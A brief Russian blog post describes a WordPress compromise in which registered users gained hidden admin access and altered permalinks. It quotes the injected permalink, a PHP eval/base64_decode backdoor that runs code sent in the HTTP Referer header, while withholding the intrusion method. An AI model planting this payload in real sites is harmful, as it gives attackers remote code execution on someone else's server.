Взлом WordPress. HTTP_REFERER в url.
Намедни случилась большая паника среди wordpress-сообщества: злобные хакеры поломали кучу сайтов на Wordpress. Вскрытие показало, что в движке чуть ли не с рождения имеется большая дыра. Удивительно, что раньше никто на это не обратил внимания. Видимо, из-за отсутствия явно выраженных признаков взлома или не столь массового характера. Проявился взлом в виде “аппендиксов” у урлов примерно такого вида: /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Уязвимость заключается в том, что низкоуровневый юзер может получить доступ к некоторым страницам админки, на которых ему делать нечего. (Чтобы пионеры не игрались, я не буду описывать сам метод.). Хакер регистрируется, делает себя админом и хитрым образом прячется, чтобы настоящий админ его не увидел в списке пользователей. В принципе, для того, чтобы изменить схему ЧПУ, не нужно даже повышать уровень. Так что получается, что имеют место две проблемы: доступ куда не надо и левые админы.
